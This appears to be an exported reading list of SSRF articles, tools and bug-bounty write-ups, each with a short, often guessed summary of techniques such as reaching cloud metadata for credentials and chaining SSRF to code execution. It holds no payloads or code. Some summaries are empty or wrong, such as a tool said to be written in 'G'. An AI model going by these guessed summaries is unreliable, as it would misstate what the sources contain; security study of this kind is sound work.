1472025-08-14 03:57:07 UTCExploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta BlesThe content discusses exploiting XML External Entity (XXE) vulnerabilities to achieve Server-Side Request Forgery (SSRF) and retrieve Identity and Access Management (IAM) credentials of Amazon EC2 instances. The focus is on the technique of leveraging XXE vulnerabilities to manipulate XML input and trigger SSRF attacks, leading to the extraction of sensitive IAM credentials. This method highlights the importance of understanding and securing against XXE vulnerabilities to prevent unauthorized access to critical resources like IAM credentials on cloud platforms such as Amazon EC2.
1482025-08-14 03:57:05 UTCTop 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports | by CristianThe content is titled "Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports" by Cristian. It likely discusses 25 notable cases of SSRF vulnerabilities found through bug bounty programs. SSRF is a security vulnerability that allows attackers to manipulate a server into making unauthorized requests on their behalf. The article may highlight the impact of these vulnerabilities and the importance of addressing SSRF issues to enhance cybersecurity.
1492025-08-14 03:57:03 UTCA Pentester’s Guide to Server Side Request Forgery (SSRF) | by Busra DemirThe content titled "A Pentester’s Guide to Server Side Request Forgery (SSRF)" by Busra Demir likely provides insights and guidance on understanding and dealing with Server Side Request Forgery (SSRF) vulnerabilities from a penetration tester's perspective. It may cover the detection, exploitation, and mitigation of SSRF issues to enhance the security of web applications. The article is expected to offer practical advice and techniques for identifying and addressing SSRF risks in server-side code to prevent unauthorized access and data leakage.
1502025-08-14 03:57:01 UTCAWS internal metadata accessed through SSRF by Chaining an Open Redirect buThe content discusses a security vulnerability where AWS internal metadata is accessed through Server-Side Request Forgery (SSRF) by exploiting an Open Redirect vulnerability. This technique allows an attacker to manipulate requests to access sensitive information stored in AWS metadata. It highlights the importance of securing against SSRF attacks and the potential risks associated with chaining vulnerabilities like Open Redirect.
1512025-08-14 03:56:59 UTCFinding SSRF via HTML Injection inside a PDF file on AWS EC2 | by Riyaz WalThe content discusses the discovery of Server-Side Request Forgery (SSRF) through HTML injection within a PDF file hosted on Amazon Web Services (AWS) Elastic Compute Cloud (EC2) by Riyaz Wal. This vulnerability highlights the potential security risks associated with SSRF and how it can be exploited through unexpected vectors like PDF files. It underscores the importance of thorough security testing and mitigation strategies to prevent such attacks on cloud-based platforms like AWS EC2.
1522025-08-14 03:56:57 UTCEscalating SSRF to Accessing all user PII information by aws metadata | byThe content appears to discuss escalating SSRF (Server-Side Request Forgery) attacks to gain access to all user Personally Identifiable Information (PII) through AWS metadata. This type of attack involves manipulating a server to make requests on behalf of the attacker, potentially leading to unauthorized access to sensitive data. The article likely delves into the technical details of how SSRF vulnerabilities can be exploited to access PII stored in AWS metadata, highlighting the importance of securing systems against such attacks.
1532025-08-14 03:56:55 UTCChaining an Blind SSRF bug to Get an RCE | by Santosh Kumar Sha (@killmongaThe content discusses chaining a Blind Server-Side Request Forgery (SSRF) bug to achieve Remote Code Execution (RCE). The author, Santosh Kumar Sha (@killmonga), likely shares insights on exploiting vulnerabilities to escalate from SSRF to RCE. This process involves leveraging SSRF to manipulate server-side requests and ultimately execute arbitrary code on the target system. The content may provide a detailed explanation of the steps involved in this attack scenario.
1542025-08-14 03:56:53 UTCStory Behind Sweet SSRF.. Persistence is the Key to Success. | by Rohit SoThe content seems to discuss the story behind achieving success through persistence, possibly related to Sweet SSRF. The key message is likely to emphasize the importance of perseverance in reaching goals. The author, Rohit So, may share insights or personal experiences to highlight how persistence plays a crucial role in achieving success.
1552025-08-14 03:56:51 UTCStory of a really cool SSRF bug.. Hello all! My name is Vedant, also… | byThe content appears to be a story about a significant Server-Side Request Forgery (SSRF) bug encountered by someone named Vedant. The bug is described as "really cool," suggesting it was interesting or unique. However, the details of the bug and its impact are not provided in the summary.
1562025-08-14 03:56:49 UTCHow Github recon help me to find NINE FULL SSRF Vulnerability with AWS metaThe content discusses how utilizing Github reconnaissance techniques helped uncover nine significant Server-Side Request Forgery (SSRF) vulnerabilities associated with AWS metadata. This highlights the effectiveness of conducting thorough recon activities on Github to identify security weaknesses, particularly in relation to SSRF vulnerabilities within AWS infrastructure.
1572025-08-14 03:56:47 UTCFinding SSRF BY Full Automation. Hi, everyone | by Santosh Kumar Sha (@killThe content appears to be about finding Server-Side Request Forgery (SSRF) vulnerabilities through full automation. The author, Santosh Kumar Sha, discusses techniques or tools related to SSRF detection. The title suggests a focus on automation in the process of identifying SSRF vulnerabilities.
1582025-08-14 03:56:45 UTCIntro to SSRF. And how your firewall failed you. | by Vickie Li | MediumThe content titled "Intro to SSRF. And how your firewall failed you" by Vickie Li on Medium introduces SSRF (Server-Side Request Forgery) and discusses how firewalls can be ineffective in preventing this type of attack. SSRF allows attackers to manipulate a server into making unauthorized requests, bypassing traditional security measures like firewalls. The article likely delves into the concept of SSRF, its implications for cybersecurity, and how organizations can better protect against such threats.
1592025-08-14 03:56:43 UTCVimeo upload function SSRF. TL;DR | by Sayed Abdelhafiz | MediumThe content seems to discuss a potential Server-Side Request Forgery (SSRF) vulnerability related to Vimeo's upload function. This type of vulnerability could allow an attacker to manipulate the server into making unauthorized requests, potentially leading to data breaches or other security issues. It appears that the author, Sayed Abdelhafiz, has written about this topic on Medium. The focus is likely on raising awareness about this security risk and the importance of addressing such vulnerabilities to protect systems from exploitation.
1602025-08-14 03:56:41 UTCJust Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo Mail | by SThe content discusses escalating a Blind Server-Side Request Forgery (SSRF) vulnerability to Remote Code Execution (RCE) in Yahoo Mail, earning a reward of $15,000. The author shares their experience and techniques used to exploit the vulnerability, highlighting the importance of thorough testing and persistence in finding security flaws. The title "Just Gopher It" suggests a playful approach to tackling the challenge, emphasizing the need for creativity and determination in cybersecurity research.
1612025-08-14 03:56:39 UTCCloud SSRFThe content provided is very brief and lacks specific details or context. It seems to refer to a topic or concept related to Cloud SSRF (Server-Side Request Forgery), which involves exploiting vulnerabilities in cloud services to manipulate server requests. However, without further information, it is challenging to provide a detailed summary.
1622025-08-14 03:56:37 UTChttps://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/The content discusses Server-Side Request Forgery (SSRF) vulnerabilities, their impact, and how to find and exploit them. It explains how SSRF can be used to access internal systems, leak sensitive information, and perform various attacks. The article also covers common SSRF attack scenarios, such as bypassing security controls and accessing metadata endpoints. It emphasizes the importance of understanding SSRF risks and implementing proper security measures to prevent exploitation. The content provides insights into detecting and mitigating SSRF vulnerabilities to enhance the security posture of web applications.
1632025-08-14 03:56:35 UTCPHP SSRF Techniques. How to bypass filter_var()… | by theMiddle | secjuice™The content discusses PHP Server-Side Request Forgery (SSRF) techniques and how to bypass the filter_var() function. It likely delves into methods to manipulate input validation functions in PHP to exploit SSRF vulnerabilities. The author may provide insights on how attackers can circumvent security measures to perform SSRF attacks. The focus is on understanding and potentially exploiting weaknesses in PHP applications related to SSRF.
1642025-08-14 03:56:33 UTCHow i found an SSRF in Yahoo! Guesthouse (Recon Wins) | by Th3G3nt3lman | MThe content appears to be a blog post or article titled "How I found an SSRF in Yahoo! Guesthouse" by an author named Th3G3nt3lman. The focus seems to be on discovering a Server-Side Request Forgery (SSRF) vulnerability in Yahoo! Guesthouse through reconnaissance efforts. The author likely shares their experience, methods used, and the importance of reconnaissance in identifying security vulnerabilities.
1652025-08-14 03:56:31 UTCReading Internal Files using SSRF vulnerability | by Neeraj Sonaniya | MediThe content discusses the exploitation of Server-Side Request Forgery (SSRF) vulnerability to read internal files. The author, Neeraj Sonaniya, explores how SSRF can be used to access sensitive information stored on a server. This vulnerability allows an attacker to manipulate a server into making requests on their behalf, potentially leading to unauthorized access to internal files. The article likely provides insights into the risks associated with SSRF vulnerabilities and how they can be mitigated to protect against unauthorized data access.
1662025-08-14 03:56:25 UTCqazbnm456/awesome-web-securityThe content is a reference to a GitHub repository named "qazbnm456/awesome-web-security." This repository likely contains a curated list of resources, tools, and information related to web security. The title and content simply mention the repository's name without providing specific details about its contents.
1672025-08-14 03:56:23 UTCrbndrThe content provided is a single word, "rbndr," which does not offer any context or information to summarize.
1682025-08-14 03:56:21 UTCGitHub - bcoles/ssrf_proxy: SSRF Proxy facilitates tunneling HTTP communicaThe content refers to a GitHub repository named "ssrf_proxy" created by the user bcoles. The repository likely contains code for an SSRF Proxy tool designed to facilitate tunneling HTTP communication. This tool may help users manage Server-Side Request Forgery (SSRF) vulnerabilities by acting as a proxy for HTTP requests. The tool could potentially assist in testing and securing web applications against SSRF attacks by providing a controlled environment for handling HTTP traffic.
1692025-08-14 03:56:19 UTCAppSecEU15-Server_side_browsing_considered_harmful.pdfThe content provided is the title of a document named "AppSecEU15-Server_side_browsing_considered_harmful.pdf." The title suggests that the document likely discusses the potential risks or negative implications associated with server-side browsing in the context of application security. It implies that server-side browsing may pose threats or vulnerabilities that could be harmful to the security of applications. The document may delve into the reasons why server-side browsing is considered detrimental and provide insights on how to mitigate these risks.
1702025-08-14 03:56:17 UTCWhat is server-side request forgery (SSRF)? | AcunetixThe content is about server-side request forgery (SSRF) and is likely an introduction to the topic. SSRF is a security vulnerability that allows attackers to make requests on behalf of the server, potentially accessing sensitive information or services. It is a common issue in web applications and can lead to serious consequences if exploited. Understanding SSRF is crucial for developers and security professionals to prevent such attacks and protect their systems from unauthorized access.
1712025-08-14 03:56:15 UTCSSRF bible. Cheatsheet - Google DocsThe content provided is titled "SSRF bible. Cheatsheet" on Google Docs. It appears to be a document or resource related to Server-Side Request Forgery (SSRF), a type of web security vulnerability. The document likely contains a compilation of information, tips, and techniques related to SSRF attacks and defenses. It may serve as a quick reference guide or cheat sheet for individuals looking to understand and protect against SSRF vulnerabilities.
1722025-08-14 03:56:12 UTCThe Tale Of SSRF To RCE on .GOV Domain | by Tobydavenn | Sep, 2022 | MediumThe content is titled "The Tale Of SSRF To RCE on .GOV Domain" by Tobydavenn on Medium in September 2022. It likely discusses a story or experience related to exploiting SSRF (Server-Side Request Forgery) vulnerabilities to achieve Remote Code Execution (RCE) on a .GOV domain. The article may provide insights into cybersecurity, hacking techniques, and the importance of securing government websites against such attacks.
1732025-08-14 03:56:10 UTC(640) An overlooked parameter leads to a critical SSRF in Dropbox bug bountThe content discusses a critical Server-Side Request Forgery (SSRF) vulnerability discovered in Dropbox's bug bounty program due to an overlooked parameter. This vulnerability could potentially allow attackers to manipulate server requests and access sensitive information. The SSRF flaw was identified as a significant security issue that could have serious consequences if exploited. This finding highlights the importance of thorough security testing and the need for companies to prioritize identifying and addressing such vulnerabilities to protect their systems and data.
1742025-08-14 03:56:08 UTCSSRF Bypass ListThe content titled "SSRF Bypass List" appears to be a list related to Server-Side Request Forgery (SSRF) bypass techniques. It likely contains information on ways to circumvent SSRF protections or restrictions. The list may include methods or strategies to exploit vulnerabilities and access resources that are typically restricted. It serves as a resource for individuals interested in understanding and potentially mitigating SSRF risks.
1752025-08-14 03:56:06 UTChttps://infosecwriteups.com/walkthrough-weather-app-hack-the-box-web-challenge-34b0c930dfcaThe content is a walkthrough of a web challenge called "Weather App" from the platform Hack The Box. It provides a step-by-step guide on how to solve the challenge, including identifying vulnerabilities, exploiting them, and gaining access to the target system. The walkthrough covers topics such as reconnaissance, enumeration, exploitation, and privilege escalation. It aims to help readers understand the process of hacking a web application and improving their cybersecurity skills.
| 176 | 2025-08-14 03:56:05 UTC | hackerone-reports/tops_by_bug_type/TOPSSRF.md at master · reddelexc/hackero | The content refers to a file named TOPSSRF.md in the hackerone-reports repository on GitHub, specifically under the tops_by_bug_type directory. The file is maintained by a user named reddelexc under the hackero project. The content of the file likely contains information related to reports or data on top security vulnerabilities or bugs categorized by type, with a focus on Server-Side Request Forgery (SSRF) vulnerabilities. |
| 177 | 2025-08-14 03:56:00 UTC | Server Side Request Forgery (SSRF) Attacks & How to Prevent Them - Bright S | The content seems to discuss Server Side Request Forgery (SSRF) attacks and prevention methods. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or server exploitation. Preventive measures are likely to be detailed, such as input validation, restricting access to sensitive resources, and using secure coding practices. The article may provide insights on safeguarding servers against SSRF attacks to enhance cybersecurity. |
| 178 | 2025-08-14 03:55:56 UTC | SSRF Vulnerability From a Developer’s Perspective \| by Gupta Bless \| Geek C | The content discusses Server-Side Request Forgery (SSRF) vulnerability from a developer's perspective. It is written by Gupta Bless on Geek C. The article likely delves into the implications, risks, and potential solutions related to SSRF vulnerabilities in web applications, providing insights and guidance for developers to understand and address this security concern effectively. |
| 179 | 2025-08-14 03:55:54 UTC | https://infosecwriteups.com/multiple-http-redirects-to-bypass-ssrf-protections-45c894e5d41c | The content discusses a technique using multiple HTTP redirects to bypass Server-Side Request Forgery (SSRF) protections. By chaining together several HTTP redirects, an attacker can manipulate the server to access internal resources or perform unauthorized actions. This method can be used to exploit vulnerabilities in web applications that are susceptible to SSRF attacks. The article provides insights into how attackers can leverage this technique and offers recommendations for organizations to strengthen their defenses against SSRF vulnerabilities. |
| 180 | 2025-08-14 03:55:52 UTC | WSTG - v4.2 \| OWASP Foundation | The content is a reference to the Web Security Testing Guide (WSTG) version 4.2 provided by the OWASP Foundation. The WSTG is a comprehensive guide that outlines best practices and techniques for testing the security of web applications. It covers various aspects of web security testing to help developers and security professionals identify and address vulnerabilities in web applications. The OWASP Foundation is a non-profit organization dedicated to improving software security, and the WSTG is one of the resources they offer to promote secure web development practices. |
| 181 | 2025-08-14 03:55:50 UTC | Server-Side Request Forgery (SSRF) - Intigriti | The content is about Server-Side Request Forgery (SSRF) as discussed by Intigriti. SSRF is a security vulnerability where an attacker can manipulate a server into making unauthorized requests. It is a serious threat that can lead to data breaches and unauthorized access. Intigriti likely provides information or services related to identifying and mitigating SSRF vulnerabilities. |
| 182 | 2025-08-14 03:55:48 UTC | https://reconshell.com/awesome-ssrf-writeups/ | The provided link likely leads to a webpage listing various write-ups related to Server-Side Request Forgery (SSRF) vulnerabilities. These write-ups are likely to contain detailed explanations, examples, and techniques related to identifying and exploiting SSRF vulnerabilities in web applications. Readers can expect to find valuable insights, case studies, and practical knowledge on how SSRF vulnerabilities can be leveraged for security testing and exploitation purposes. The content is likely to be beneficial for security researchers, penetration testers, and individuals interested in learning more about SSRF vulnerabilities and their implications in cybersecurity. |
| 183 | 2025-08-14 03:55:47 UTC | GitHub - swisskyrepo/SSRFmap: Automatic SSRF fuzzer and exploitation tool | The content is about a tool called SSRFmap, available on GitHub under the swisskyrepo repository. SSRFmap is an automatic SSRF fuzzer and exploitation tool. It is designed to help identify and exploit Server-Side Request Forgery (SSRF) vulnerabilities in web applications. The tool automates the process of testing for SSRF vulnerabilities, making it easier for security professionals to identify and address these issues. |
| 184 | 2025-08-14 03:55:44 UTC | https://github.com/knassar702/lorsrf | The provided link leads to a GitHub repository belonging to user knassar702 with the title "lorsrf." The content of the repository is not specified in the request. It is recommended to visit the GitHub link to explore the contents, which likely include source code, documentation, or other resources related to the project. |
| 185 | 2025-08-14 03:55:42 UTC | 10 Types of Web Vulnerabilities that are Often Missed - Detectify Labs | The content titled "10 Types of Web Vulnerabilities that are Often Missed" by Detectify Labs likely discusses various common web vulnerabilities that are frequently overlooked by developers and security professionals. It may provide insights into lesser-known vulnerabilities that can pose risks to websites and web applications. The article could offer valuable information on how to detect and address these vulnerabilities to enhance the security of online platforms. |
| 186 | 2025-08-14 03:55:40 UTC | Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability | The content is a beginner's guide to exploiting Server Side Request Forgery (SSRF) vulnerability. It likely covers the basics of identifying and exploiting SSRF vulnerabilities, which involve manipulating a server to make unauthorized requests on behalf of the attacker. The guide may provide insights into how SSRF vulnerabilities can be leveraged for malicious purposes and the potential risks associated with such exploits. It serves as an introductory resource for individuals looking to understand and potentially exploit SSRF vulnerabilities. |
| 187 | 2025-08-14 03:55:36 UTC | On SSRF (Server Side Request Forgery) or Simple Stuff Rodolfo Found | The content discusses SSRF (Server Side Request Forgery) and the discoveries made by Rodolfo related to this vulnerability. SSRF involves manipulating a server to make unauthorized requests on behalf of the attacker. Rodolfo's findings likely pertain to identifying and potentially exploiting SSRF vulnerabilities. This type of attack can have serious consequences, allowing attackers to access sensitive information or internal systems. It is crucial for organizations to be aware of SSRF risks and implement security measures to prevent such attacks. |
| 188 | 2025-08-14 03:55:35 UTC | SSRF In The Wild - Vickie Li’s Security Blog | The content is titled "SSRF In The Wild - Vickie Li’s Security Blog." It likely discusses Server-Side Request Forgery (SSRF) vulnerabilities encountered in real-world scenarios, possibly shared by Vickie Li on her security blog. This type of vulnerability allows attackers to manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. The blog post may provide insights, examples, or solutions related to SSRF vulnerabilities to raise awareness and improve security practices. |
| 189 | 2025-08-14 03:55:32 UTC | SSRF - HowToHunt | The content appears to be about Server-Side Request Forgery (SSRF) and a guide or tutorial called "HowToHunt" related to this topic. SSRF is a security vulnerability that allows an attacker to manipulate a server into making unauthorized requests. The "HowToHunt" guide likely provides information on how to identify and mitigate SSRF vulnerabilities. It seems to be a concise reference or resource for individuals interested in learning more about SSRF and how to protect against it. |
| 190 | 2025-08-14 03:55:30 UTC | CodeNinja | The content provided is simply the term "CodeNinja." It appears to be a standalone word without any additional context or information provided. |
| 191 | 2025-08-14 03:55:28 UTC | SSRF Cheat Sheet & Bypass Techniques | The content is a reference guide for Server-Side Request Forgery (SSRF) attacks, providing a cheat sheet and techniques to bypass security measures. SSRF is a type of vulnerability that allows attackers to manipulate a server into making unauthorized requests on their behalf. The cheat sheet likely includes common payloads and methods to exploit SSRF vulnerabilities, while the bypass techniques may offer ways to circumvent protections put in place to prevent such attacks. This resource is valuable for security professionals and developers to understand and defend against SSRF threats effectively. |
| 192 | 2025-08-14 03:55:26 UTC | The journey of Web Cache Firewall Bypass to SSRF to AWS credentials compr | The content discusses the progression from a Web Cache Firewall Bypass to Server-Side Request Forgery (SSRF) and ultimately obtaining AWS credentials through a comprehensive process. This journey likely involves exploiting vulnerabilities in web systems to bypass security measures, manipulate server requests, and ultimately gain access to sensitive AWS credentials. The content highlights the evolution of techniques used by attackers to compromise systems and underscores the importance of robust security measures to prevent such breaches. |
| 193 | 2025-08-14 03:55:20 UTC | https://github.com/lutfumertceylan/top25-parameter | The provided link redirects to a GitHub repository named "top25-parameter" created by a user named lutfumertceylan. The content of the repository is not specified in the request. It is recommended to visit the GitHub link directly to explore the details of the "top25-parameter" repository and its contents. |
| 194 | 2025-08-14 03:55:18 UTC | Server Side Request Forgery | Server Side Request Forgery (SSRF) is a vulnerability where an attacker tricks a server into making unintended requests on their behalf. This can lead to unauthorized access to internal systems, data leaks, and potential server exploitation. Preventing SSRF involves input validation, using whitelists for allowed URLs, and restricting access to sensitive resources. It is crucial for developers and organizations to be aware of SSRF risks and implement security measures to mitigate this threat. |
| 195 | 2025-08-14 03:55:16 UTC | https://www.hahwul.com/phoenix/ssrf-open-redirect/ | The content discusses the exploitation of Server-Side Request Forgery (SSRF) vulnerabilities combined with Open Redirect flaws. It explains how attackers can abuse these weaknesses to redirect users to malicious websites, potentially leading to further attacks like phishing or malware distribution. The article emphasizes the importance of understanding and mitigating these risks to protect web applications and users. It provides insights into the technical aspects of these vulnerabilities and offers guidance on how to prevent such attacks by implementing secure coding practices and conducting thorough security assessments. |
| 196 | 2025-08-14 03:55:12 UTC | A Glossary of Blind SSRF Chains – Assetnote | The content is likely a glossary provided by Assetnote that focuses on Blind Server-Side Request Forgery (SSRF) chains. This glossary is likely to contain definitions and explanations related to the concept of Blind SSRF chains, which are a type of vulnerability that can be exploited by attackers to make requests on behalf of the server. It is a resource that may help individuals understand and identify Blind SSRF chains and their implications in cybersecurity. |
| 197 | 2025-08-14 03:55:10 UTC | Awesome Bug Bounty Tools | The content simply states "Awesome Bug Bounty Tools" without providing any specific information or details about the tools. It seems to be a title or heading rather than a detailed explanation or list of tools. |
| 198 | 2025-08-14 03:55:08 UTC | https://github.com/ethicalhackingplayground/ssrf-king | The provided link leads to a GitHub repository named "ssrf-king" under the username "ethicalhackingplayground." The content of the repository is not specified in the request and therefore cannot be summarized. It is recommended to visit the GitHub link directly to explore the contents of the "ssrf-king" repository for information related to SSRF (Server-Side Request Forgery) and other relevant topics. |
| 199 | 2025-08-14 03:55:07 UTC | https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ | The content discusses the use of Burp Suite, a popular tool for penetration testing, in combination with Hackbar, a Firefox add-on. It explains how to install and use Hackbar within Burp Suite to enhance the testing process by enabling quick access to various functionalities like encoding, decoding, and executing commands. The article provides step-by-step instructions on setting up Hackbar in Burp Suite and demonstrates its utility in performing tasks such as URL manipulation and payload testing. Overall, it highlights the benefits of integrating Hackbar with Burp Suite for efficient and effective penetration testing. |
| 200 | 2025-08-14 03:55:04 UTC | A Pentester’s Guide to Server Side Request Forgery (SSRF) | The content is titled "A Pentester’s Guide to Server Side Request Forgery (SSRF)" but does not provide any specific information or details about SSRF. It seems to be an introductory title or placeholder for a guide aimed at penetration testers exploring SSRF vulnerabilities. |
| 201 | 2025-08-14 03:55:02 UTC | Dark Side 108: Intro to SSRF — Server-Side Request Forgery \| by Katlyn Gall | The content titled "Dark Side 108: Intro to SSRF — Server-Side Request Forgery" by Katlyn Gall likely introduces readers to the concept of SSRF (Server-Side Request Forgery). SSRF involves manipulating a server into making unintended requests, potentially leading to security vulnerabilities. The article may delve into the risks associated with SSRF attacks and ways to prevent them. It serves as an introductory guide to understanding and addressing SSRF threats in web applications. |
| 202 | 2025-08-14 03:55:00 UTC | $10000 Facebook SSRF (Bug Bounty) \| by Amine Aboud \| Medium | The content is titled "$10000 Facebook SSRF (Bug Bounty)" by Amine Aboud on Medium. It likely discusses a security vulnerability known as Server-Side Request Forgery (SSRF) found on Facebook, which was eligible for a bug bounty reward of $10,000. The article may detail the discovery and reporting process of this SSRF bug on Facebook's platform, highlighting the importance of bug bounty programs in enhancing cybersecurity. |
| 203 | 2025-08-14 03:54:58 UTC | Blind SSRF - The Hide & Seek Game \| by Jerry Shah (Jerry) \| Medium | The content titled "Blind SSRF - The Hide & Seek Game" by Jerry Shah on Medium likely discusses the concept of Server-Side Request Forgery (SSRF) vulnerabilities, where attackers manipulate a server into making unauthorized requests. The title suggests a focus on a specific type of SSRF attack known as Blind SSRF, which involves making requests without receiving direct responses. The author, Jerry Shah, may delve into the intricacies of this type of attack and provide insights on how to detect and prevent Blind SSRF vulnerabilities. |
| 204 | 2025-08-14 03:54:56 UTC | Server-Side Request Forgery — SSRF: Exploitation Technique \| by goswamiijay | The content titled "Server-Side Request Forgery — SSRF: Exploitation Technique" by goswamiijay likely discusses the concept of Server-Side Request Forgery (SSRF) as an exploitation technique. SSRF involves manipulating a server into making unintended requests, potentially leading to unauthorized access or data leakage. The article may delve into how SSRF attacks work, their impact on web applications, and strategies to prevent such vulnerabilities. |
| 205 | 2025-08-14 03:54:54 UTC | Exploiting: SSRF For Admin Access \| by Gupta Bless \| InfoSec Write-ups | The content appears to be about exploiting Server-Side Request Forgery (SSRF) vulnerabilities to gain admin access. It is likely a write-up by Gupta Bless in the field of Information Security (InfoSec). SSRF is a type of security vulnerability that allows an attacker to manipulate the server into making unauthorized requests, potentially leading to unauthorized access. The article may provide insights or techniques on how SSRF can be exploited to gain admin privileges. |
| 206 | 2025-08-14 03:54:50 UTC | https://link.medium.com/3LqSxFV4j9 | |
| 207 | 2025-08-14 03:54:49 UTC | Oh snap! We don't support this version of your browser, and neither should | The content emphasizes that a specific version of the browser is not supported. It suggests that users should not rely on this unsupported version. The message is concise and direct, indicating that the browser version in question is not compatible with the platform or service being accessed. |
| 208 | 2025-08-14 03:54:46 UTC | https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-f62235a2c151 | The content discusses Server-Side Request Forgery (SSRF), a vulnerability that allows attackers to manipulate a server into making unintended requests. It explains how SSRF works, its impact on security, and provides examples of SSRF attacks. The article also covers how to prevent SSRF attacks, including input validation, using allowlists, and restricting access to sensitive resources. Additionally, it emphasizes the importance of understanding and mitigating SSRF vulnerabilities to protect systems from potential exploitation. |
| 209 | 2025-08-14 03:54:44 UTC | My First Bug: Blind SSRF Through Profile Picture Upload \| by swaysthinking | The content is titled "My First Bug: Blind SSRF Through Profile Picture Upload" by swaysthinking. The main focus is likely on the author's experience discovering a blind Server-Side Request Forgery (SSRF) vulnerability through a profile picture upload feature. This bug allowed unauthorized access to internal systems through manipulating the server's requests. The content may detail the discovery process, the impact of the vulnerability, and possibly the steps taken to report and address the issue. |
| 210 | 2025-08-14 03:54:42 UTC | Vimeo SSRF with code execution potential. \| by Harsh Jaiswal \| InfoSec Writ | The content discusses a security vulnerability in Vimeo known as Server-Side Request Forgery (SSRF) that could potentially lead to code execution. The vulnerability was identified by Harsh Jaiswal and poses a risk to the platform's security. SSRF allows attackers to manipulate server requests and potentially execute malicious code. This highlights the importance of addressing and patching such vulnerabilities to prevent unauthorized access and protect user data. |
| 211 | 2025-08-14 03:54:40 UTC | Story of a 2.5k Bounty — SSRF on Zimbra Led to Dump All Credentials in Clea | The content discusses a story where a bounty of $2.5k was rewarded for discovering a Server-Side Request Forgery (SSRF) vulnerability on Zimbra. This vulnerability allowed the attacker to dump all credentials in cleartext. The focus is on the impact of the SSRF exploit on Zimbra's security and the importance of addressing such vulnerabilities to prevent unauthorized access to sensitive information. |
| 212 | 2025-08-14 03:54:38 UTC | Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf | The content is a document titled "Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf." It likely contains information and guidelines on preventing server-side request forgery (SSRF) attacks. SSRF is a vulnerability where an attacker can manipulate a server into making unintended requests on their behalf. The document may provide cheat sheets or best practices to help developers protect their systems from SSRF attacks. It could be a valuable resource for understanding and mitigating this security risk. |
| 213 | 2025-08-14 03:54:36 UTC | Capital One SSRF \| Kontra Application Security Training | The content appears to mention a topic related to Capital One's Server-Side Request Forgery (SSRF) vulnerability. It may also refer to Kontra Application Security Training, which could be a resource for learning about application security, potentially including how to identify and mitigate SSRF vulnerabilities. The content seems to highlight the importance of understanding and addressing security issues like SSRF to protect sensitive data and systems from potential cyber threats. |
| 214 | 2025-08-14 03:54:34 UTC | https://link.medium.com/j3rkNajmr5 | |
| 215 | 2025-08-14 03:54:32 UTC | Exploiting an SSRF: Trials and Tribulations \| by A Bug’z Life \| A Bug’z Lif | The content seems to focus on the topic of exploiting Server-Side Request Forgery (SSRF) vulnerabilities. It suggests that the process of exploiting SSRF vulnerabilities can be challenging and may involve various trials and tribulations. The author, identified as A Bug'z Life, likely shares insights, experiences, or techniques related to SSRF exploitation. The content may delve into the complexities and difficulties encountered when attempting to exploit SSRF vulnerabilities. |
| 216 | 2025-08-14 03:54:30 UTC | SSRF (Server Side Request Forgery) - HackTricks | The content is about SSRF (Server Side Request Forgery) and is part of the HackTricks series. SSRF is a vulnerability that allows an attacker to make requests on behalf of the server, potentially accessing internal systems or performing malicious actions. The HackTricks series likely provides information on exploiting and defending against SSRF attacks. |
| 217 | 2025-08-14 03:54:28 UTC | https://link.medium.com/CWHpG8ePe2 | |
| 218 | 2025-08-14 03:54:26 UTC | https://blog.appsecco.com/server-side-request-forgery-ssrf-and-aws-ec2-instances-after-instance-meta-data-service-version-38fc1ba1a28a | The content discusses Server-Side Request Forgery (SSRF) vulnerabilities in AWS EC2 instances after the introduction of a new version of the Instance Metadata Service. It highlights how attackers can exploit SSRF to access sensitive information or launch attacks within the AWS environment. The article provides insights into the impact of SSRF vulnerabilities, the importance of securing EC2 instances, and recommendations for mitigating SSRF risks. It emphasizes the need for proper security measures to protect against SSRF threats in AWS environments. |
| 219 | 2025-08-14 03:54:24 UTC | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Request Forgery | The content is a GitHub repository by swisskyrepo called "PayloadsAllTheThings" focusing on Server Side Request Forgery (SSRF). It likely contains a collection of payloads, techniques, and information related to SSRF vulnerabilities. The repository may serve as a resource for security researchers, developers, and anyone interested in understanding and mitigating SSRF risks in web applications. |
| 220 | 2025-08-14 03:54:22 UTC | SSRF payloads. Payloads with localhost \| by Pravinrp \| Medium | The content seems to focus on SSRF (Server-Side Request Forgery) payloads that involve using localhost. It appears to be an article or post written by Pravinrp on Medium. SSRF is a security vulnerability where an attacker can manipulate a web application to make requests on behalf of the server. Using payloads with localhost in SSRF attacks can be a way to exploit the vulnerability. The content likely delves into techniques or examples of how attackers can leverage SSRF with localhost for malicious purposes. |
| 221 | 2025-08-14 03:54:20 UTC | https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html | |
| 222 | 2025-08-14 03:54:18 UTC | https://link.medium.com/VoengTvAi1 | |
| 223 | 2025-08-14 03:54:16 UTC | GitHub - teknogeek/ssrf-sheriff: A simple SSRF-testing sheriff written in G | The content refers to a GitHub repository named "teknogeek/ssrf-sheriff" which contains a simple SSRF-testing sheriff tool written in the programming language G. This tool is designed to help with testing for Server-Side Request Forgery (SSRF) vulnerabilities. It is likely a useful resource for developers and security professionals looking to enhance the security of their applications by identifying and addressing SSRF issues efficiently. |
| 224 | 2025-08-14 03:54:12 UTC | http://amp.kitploit.com/2019/08/b-xssrf-toolkit-to-detect-and-keep.html?amp=0 | The content is about a toolkit called "B-XSSRF" designed to detect and prevent Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides features like scanning for vulnerable URLs, detecting blind XSS, and generating payloads to test for SSRF. The toolkit aims to enhance security by identifying and mitigating these common web application vulnerabilities. |
